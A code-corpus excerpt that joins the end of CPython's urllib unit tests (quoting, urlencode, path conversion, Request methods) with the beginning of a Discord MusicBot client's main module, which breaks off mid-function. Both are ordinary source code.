self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII Encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request..url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_splitpasswd(self):
"""Some of password examples are not sensible, but it is added to
confirming to RFC2617 and addressing issue4675.
"""
self.assertEqual(('user', 'ab'),urllib.parse.splitpasswd('user:ab'))
self.assertEqual(('user', 'a\nb'),urllib.parse.splitpasswd('user:a\nb'))
self.assertEqual(('user', 'a\tb'),urllib.parse.splitpasswd('user:a\tb'))
self.assertEqual(('user', 'a\rb'),urllib.parse.splitpasswd('user:a\rb'))
self.assertEqual(('user', 'a\fb'),urllib.parse.splitpasswd('user:a\fb'))
self.assertEqual(('user', 'a\vb'),urllib.parse.splitpasswd('user:a\vb'))
self.assertEqual(('user', 'a:b'),urllib.parse.splitpasswd('user:a:b'))
self.assertEqual(('user', 'a b'),urllib.parse.splitpasswd('user:a b'))
self.assertEqual(('user 2', 'ab'),urllib.parse.splitpasswd('user 2:ab'))
self.assertEqual(('user+1', 'a+b'),urllib.parse.splitpasswd('user+1:a+b'))
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
|
the-stack_0_6593 | import os
import sys
import time
import shlex
import shutil
import random
import inspect
import logging
import asyncio
import pathlib
import traceback
import math
import re
import aiohttp
import discord
import colorlog
from io import BytesIO, StringIO
from functools import wraps
from textwrap import dedent
from datetime import timedelta
from collections import defaultdict
from discord.enums import ChannelType
from . import exceptions
from . import downloader
from .playlist import Playlist
from .player import MusicPlayer
from .entry import StreamPlaylistEntry
from .opus_loader import load_opus_lib
from .config import Config, ConfigDefaults
from .permissions import Permissions, PermissionsDefaults
from .aliases import Aliases, AliasesDefault
from .constructs import SkipState, Response
from .utils import (
load_file,
write_file,
fixg,
ftimedelta,
_func_,
_get_variable,
format_song_duration,
)
from .spotify import Spotify
from .json import Json
from .constants import VERSION as BOTVERSION
from .constants import DISCORD_MSG_CHAR_LIMIT, AUDIO_CACHE_PATH
from typing import Optional
load_opus_lib()
log = logging.getLogger(__name__)
intents = discord.Intents.all()
intents.typing = False
intents.presences = False
class MusicBot(discord.Client):
def __init__(self, config_file=None, perms_file=None, aliases_file=None):
try:
sys.stdout.write("\x1b]2;MusicBot {}\x07".format(BOTVERSION))
except:
pass
print()
if config_file is None:
config_file = ConfigDefaults.options_file
if perms_file is None:
perms_file = PermissionsDefaults.perms_file
if aliases_file is None:
aliases_file = AliasesDefault.aliases_file
self.players = {}
self.exit_signal = None
self.init_ok = False
self.cached_app_info = None
self.last_status = None
self.config = Config(config_file)
self._setup_logging()
self.permissions = Permissions(perms_file, grant_all=[self.config.owner_id])
self.str = Json(self.config.i18n_file)
if self.config.usealias:
self.aliases = Aliases(aliases_file)
self.blacklist = set(load_file(self.config.blacklist_file))
self.autoplaylist = load_file(self.config.auto_playlist_file)
self.aiolocks = defaultdict(asyncio.Lock)
self.downloader = downloader.Downloader(download_folder="audio_cache")
log.info("Starting MusicBot {}".format(BOTVERSION))
if not self.autoplaylist:
log.warning("Autoplaylist is empty, disabling.")
self.config.auto_playlist = False
else:
log.info(
"Loaded autoplaylist with {} entries".format(len(self.autoplaylist))
)
if self.blacklist:
log.debug("Loaded blacklist with {} entries".format(len(self.blacklist)))
# TODO: Do these properly
ssd_defaults = {
"last_np_msg": None,
"auto_paused": False,
"availability_paused": False,
}
self.server_specific_data = defaultdict(ssd_defaults.copy)
super().__init__(intents=intents)
self.http.user_agent = "MusicBot/%s" % BOTVERSION
self.aiosession = aiohttp.ClientSession(
loop=self.loop, headers={"User-Agent": self.http.user_agent}
)
self.spotify = None
if self.config._spotify:
try:
self.spotify = Spotify(
self.config.spotify_clientid,
self.config.spotify_clientsecret,
aiosession=self.aiosession,
loop=self.loop,
)
if not self.spotify.token:
log.warning("Spotify did not provide us with a token. Disabling.")
self.config._spotify = False
else:
log.info(
"Authenticated with Spotify successfully using client ID and secret."
)
except exceptions.SpotifyError as e:
log.warning(
"There was a problem initialising the connection to Spotify. Is your client ID and secret correct? Details: {0}. Continuing anyway in 5 seconds...".format(
e
)
)
self.config._spotify = False
time.sleep(5) # make sure they see the problem
else:
try:
log.warning(
"The config did not have Spotify app credentials, attempting to use guest mode."
)
self.spotify = Spotify(
None, None, aiosession=self.aiosession, loop=self.loop
)
if not self.spotify.token:
log.warning("Spotify did not provide us with a token. Disabling.")
self.config._spotify = False
else:
log.info(
"Authenticated with Spotify successfully using guest mode."
)
self.config._spotify = True
except exceptions.SpotifyError as e:
log.warning(
"There was a problem initialising the connection to Spotify using guest mode. Details: {0}.".format(
e
)
)
self.config._spotify = False
# TODO: Add some sort of `denied` argument for a message to send when someone else tries to use it
def owner_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
# Only allow the owner to use these commands
orig_msg = _get_variable("message")
if not orig_msg or orig_msg.author.id == self.config.owner_id:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError(
"Only the owner can use this command.", expire_in=30
)
return wrapper
def dev_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
orig_msg = _get_variable("message")
if str(orig_msg.author.id) in self.config.dev_ids:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError(
"Only dev users can use this command.", expire_in=30
)
wrapper.dev_cmd = True
return wrapper
def ensure_appinfo(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
await self._cache_app_info()
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
return wrapper
def _get_owner(self, *, server=None, voice=False):
return discord.utils.find(
lambda m: m.id == self.config.owner_id and (m.voice if voice else True),
server.members if server else self.get_all_members(),
)
def _delete_old_audiocache(self, path=AUDIO_CACHE_PATH):
try:
shutil.rmtree(path)
return True
except:
try:
os.rename(path, path + "__")
except:
return False
try:
shutil.rmtree(path)
except:
os.rename(path + "__", path)
return False
return True
def _setup_logging(self):
if len(logging.getLogger(__package__).handlers) > 1:
log.debug("Skipping logger setup, already set up")
return
shandler = logging.StreamHandler(stream=sys.stdout)
sformatter = colorlog.LevelFormatter(
fmt={
"DEBUG": "{log_color}[{levelname}:{module}] {message}",
"INFO": "{log_color}{message}",
"WARNING": "{log_color}{levelname}: {message}",
"ERROR": "{log_color}[{levelname}:{module}] {message}",
"CRITICAL": "{log_color}[{levelname}:{module}] {message}",
"EVERYTHING": "{log_color}[{levelname}:{module}] {message}",
"NOISY": "{log_color}[{levelname}:{module}] {message}",
"VOICEDEBUG": "{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}",
"FFMPEG": "{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}",
},
log_colors={
"DEBUG": "cyan",
"INFO": "white",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "bold_red",
"EVERYTHING": "white",
"NOISY": "white",
"FFMPEG": "bold_purple",
"VOICEDEBUG": "purple",
},
style="{",
datefmt="",
)
shandler.setFormatter(sformatter)
shandler.setLevel(self.config.debug_level)
logging.getLogger(__package__).addHandler(shandler)
log.debug("Set logging level to {}".format(self.config.debug_level_str))
if self.config.debug_mode:
dlogger = logging.getLogger("discord")
dlogger.setLevel(logging.DEBUG)
dhandler = logging.FileHandler(
filename="logs/discord.log", encoding="utf-8", mode="w"
)
dhandler.setFormatter(
logging.Formatter("{asctime}:{levelname}:{name}: {message}", style="{")
)
dlogger.addHandler(dhandler)
@staticmethod
def _check_if_empty(
vchannel: discord.abc.GuildChannel, *, excluding_me=True, excluding_deaf=False
):
def check(member):
if excluding_me and member == vchannel.guild.me:
return False
if excluding_deaf and any([member.deaf, member.self_deaf]):
return False
if member.bot:
return False
return True
return not sum(1 for m in vchannel.members if check(m))
async def _join_startup_channels(self, channels, *, autosummon=True):
joined_servers = set()
channel_map = {c.guild: c for c in channels}
def _autopause(player):
if self._check_if_empty(player.voice_client.channel):
log.info("Initial autopause in empty channel")
player.pause()
self.server_specific_data[player.voice_client.channel.guild][
"auto_paused"
] = True
for guild in self.guilds:
if guild.unavailable or guild in channel_map:
continue
if guild.me.voice:
log.info(
"Found resumable voice channel {0.guild.name}/{0.name}".format(
guild.me.voice.channel
)
)
channel_map[guild] = guild.me.voice.channel
if autosummon:
owner = self._get_owner(server=guild, voice=True)
if owner:
log.info('Found owner in "{}"'.format(owner.voice.channel.name))
channel_map[guild] = owner.voice.channel
for guild, channel in channel_map.items():
if guild in joined_servers:
log.info(
'Already joined a channel in "{}", skipping'.format(guild.name)
)
continue
if channel and isinstance(channel, discord.VoiceChannel):
log.info("Attempting to join {0.guild.name}/{0.name}".format(channel))
chperms = channel.permissions_for(guild.me)
if not chperms.connect:
log.info(
'Cannot join channel "{}", no permission.'.format(channel.name)
)
continue
elif not chperms.speak:
log.info(
'Will not join channel "{}", no permission to speak.'.format(
channel.name
)
)
continue
try:
player = await self.get_player(
channel, create=True, deserialize=self.config.persistent_queue
)
joined_servers.add(guild)
log.info("Joined {0.guild.name}/{0.name}".format(channel))
if player.is_stopped:
player.play()
if self.config.auto_playlist:
if self.config.auto_pause:
player.once("play", lambda player, **_: _autopause(player))
if not player.playlist.entries:
await self.on_player_finished_playing(player)
except Exception:
log.debug(
"Error joining {0.guild.name}/{0.name}".format(channel),
exc_info=True,
)
log.error("Failed to join {0.guild.name}/{0.name}".format(channel))
elif channel:
log.warning(
"Not joining {0.guild.name}/{0.name}, that's a text channel.".format(
channel
)
)
else:
log.warning("Invalid channel thing: {}".format(channel))
async def _wait_delete_msg(self, message, after):
await asyncio.sleep(after)
await self.safe_delete_message(message, quiet=True)
# TODO: Check to see if I can just move this to on_message after the response check
async def _manual_delete_check(self, message, *, quiet=False):
if self.config.delete_invoking:
await self.safe_delete_message(message, quiet=quiet)
async def _check_ignore_non_voice(self, msg):
if msg.guild.me.voice:
vc = msg.guild.me.voice.channel
else:
vc = None
# If we've connected to a voice chat and we're in the same voice channel
if not vc or (msg.author.voice and vc == msg.author.voice.channel):
return True
else:
raise exceptions.PermissionsError(
"you cannot use this command when not in the voice channel (%s)"
% vc.name,
expire_in=30,
)
async def _cache_app_info(self, *, update=False):
if not self.cached_app_info and not update and self.user.bot:
log.debug("Caching app info")
self.cached_app_info = await self.application_info()
return self.cached_app_info
async def remove_from_autoplaylist(
self, song_url: str, *, ex: Exception = None, delete_from_ap=False
):
if song_url not in self.autoplaylist:
log.debug('URL "{}" not in autoplaylist, ignoring'.format(song_url))
return
async with self.aiolocks[_func_()]:
self.autoplaylist.remove(song_url)
log.info(
"Removing unplayable song from session autoplaylist: %s" % song_url
)
with open(
self.config.auto_playlist_removed_file, "a", encoding="utf8"
) as f:
f.write(
"# Entry removed {ctime}\n"
"# Reason: {ex}\n"
"{url}\n\n{sep}\n\n".format(
ctime=time.ctime(),
ex=str(ex).replace(
"\n", "\n#" + " " * 10
), # 10 spaces to line up with # Reason:
url=song_url,
sep="#" * 32,
)
)
if delete_from_ap:
log.info("Updating autoplaylist")
write_file(self.config.auto_playlist_file, self.autoplaylist)
@ensure_appinfo
async def generate_invite_link(
self, *, permissions=discord.Permissions(70380544), guild=None
):
return discord.utils.oauth_url(
self.cached_app_info.id, permissions=permissions, guild=guild
)
async def get_voice_client(self, channel: discord.abc.GuildChannel):
if isinstance(channel, discord.Object):
channel = self.get_channel(channel.id)
if not isinstance(channel, discord.VoiceChannel):
raise AttributeError("Channel passed must be a voice channel")
if channel.guild.voice_client:
return channel.guild.voice_client
else:
client = await channel.connect(timeout=60, reconnect=True)
await channel.guild.change_voice_state(channel=channel, self_mute=False, self_deaf=True)
return client
async def disconnect_voice_client(self, guild):
vc = self.voice_client_in(guild)
if not vc:
return
if guild.id in self.players:
self.players.pop(guild.id).kill()
await vc.disconnect()
async def disconnect_all_voice_clients(self):
for vc in list(self.voice_clients).copy():
await self.disconnect_voice_client(vc.channel.guild)
def get_player_in(self, guild: discord.Guild) -> Optional[MusicPlayer]:
return self.players.get(guild.id)
async def get_player(
self, channel, create=False, *, deserialize=False
) -> MusicPlayer:
guild = channel.guild
async with self.aiolocks[_func_() + ":" + str(guild.id)]:
if deserialize:
voice_client = await self.get_voice_client(channel)
player = await self.deserialize_queue(guild, voice_client)
if player:
log.debug(
"Created player via deserialization for guild %s with %s entries",
guild.id,
len(player.playlist),
)
# Since deserializing only happens when the bot starts, I should never need to reconnect
return self._init_player(player, guild=guild)
if guild.id not in self.players:
if not create:
raise exceptions.CommandError(
"The bot is not in a voice channel. "
"Use %ssummon to summon it to your voice channel."
% self.config.command_prefix
)
voice_client = await self.get_voice_client(channel)
playlist = Playlist(self)
player = MusicPlayer(self, voice_client, playlist)
self._init_player(player, guild=guild)
return self.players[guild.id]
def _init_player(self, player, *, guild=None):
player = (
player.on("play", self.on_player_play)
